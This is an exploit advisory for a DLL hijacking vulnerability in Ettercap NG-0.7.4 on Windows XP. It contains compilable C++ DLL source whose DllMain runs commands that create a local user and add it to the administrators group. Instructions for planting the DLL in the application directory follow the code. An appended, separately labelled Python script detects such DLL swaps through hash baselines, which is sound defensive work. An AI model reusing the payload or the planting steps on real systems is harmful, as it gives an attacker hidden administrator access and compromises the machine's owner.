Ettercap NG version 0.7.4 suffers from a DLL hijacking vulnerability.
d04c00509e1d3444d662e6b7f22e92825bfd705db741648e0c2385bed9551510
Exploit Title: ettercap NG-0.7.4 Dll hijacking vulnerability (quserex.dll - exchndl.dll)
Date: Tuesday April 24
Author: nimaarek
Software Link: http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/
Version: NG-0.7.4
Tested on: Windows XP SP3
/*
Application Information:
Application: Ettercap.exe
Version: NG-0.7.4
Company Name: The EtterCap community, http://ettercap.sourceforge.net/
File Date: Tuesday April 24
Description: EtterCap sniffer
Operating System: Windows XP SP3
Total Extensions Verified: 2
Verified Extensions: htm;html;
*/
=============================================================
//tested on Windows XP SP3
#include "stdafx.h"
#include "windows.h"
#include <cstdlib>

int main()
{
    system("net user apuser appass /add");
    system("net localgroup administrators apuser /add");
    exit(0);
    return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        main();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
=============================================================
Instructions:
1. Compile the DLL
2. Replace exchndl.dll or quserex.dll in the Ettercap directory with your newly compiled DLL
3. Launch Ettercap
4. Bo0o0o0o0o0o0o0m !
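Added defensive example (not part of the original advisory): step 2 depends on a DLL in the application directory being silently replaced, so a hash baseline of that directory exposes the swap. Only the two DLL names come from the advisory; the directory, file contents and function names are constructed for the demonstration.

```python
import hashlib
import os
import tempfile

# DLL names taken from the advisory; everything else is constructed for the demo.
WATCHED = {"exchndl.dll", "quserex.dll"}

def sha256_file(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(app_dir):
    """Map lower-cased DLL file name -> SHA-256 for every DLL in app_dir."""
    return {
        name.lower(): sha256_file(os.path.join(app_dir, name))
        for name in sorted(os.listdir(app_dir))
        if name.lower().endswith(".dll")
    }

def compare(baseline, current):
    """Return (status, name) findings sorted by name: missing, added or replaced."""
    findings = []
    for name in sorted(set(baseline) | set(current)):
        if name not in current:
            findings.append(("missing", name))
        elif name not in baseline:
            findings.append(("added", name))
        elif baseline[name] != current[name]:
            findings.append(("replaced", name))
    return findings

def demo():
    """Constructed scenario: baseline a stand-in install dir, swap one DLL, rescan."""
    with tempfile.TemporaryDirectory() as d:
        for name in WATCHED:
            with open(os.path.join(d, name), "wb") as f:
                f.write(b"constructed placeholder for " + name.encode())
        baseline = snapshot(d)
        with open(os.path.join(d, "exchndl.dll"), "wb") as f:
            f.write(b"different bytes, standing in for a swapped file")
        return compare(baseline, snapshot(d))

if __name__ == "__main__":
    for status, name in demo():
        print(status, name, "(watched)" if name in WATCHED else "")
```

The baseline is only meaningful if it is taken from a known-good install and stored where an unprivileged user cannot rewrite it; restricting write access on the application directory removes the precondition for the swap itself.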
Greet to my Lovely friends :
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+
|M|O|H|3|N|C|O|D|E|r| |a|n|d| |A|m|i|r| |N|e|m|a|t|i|
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+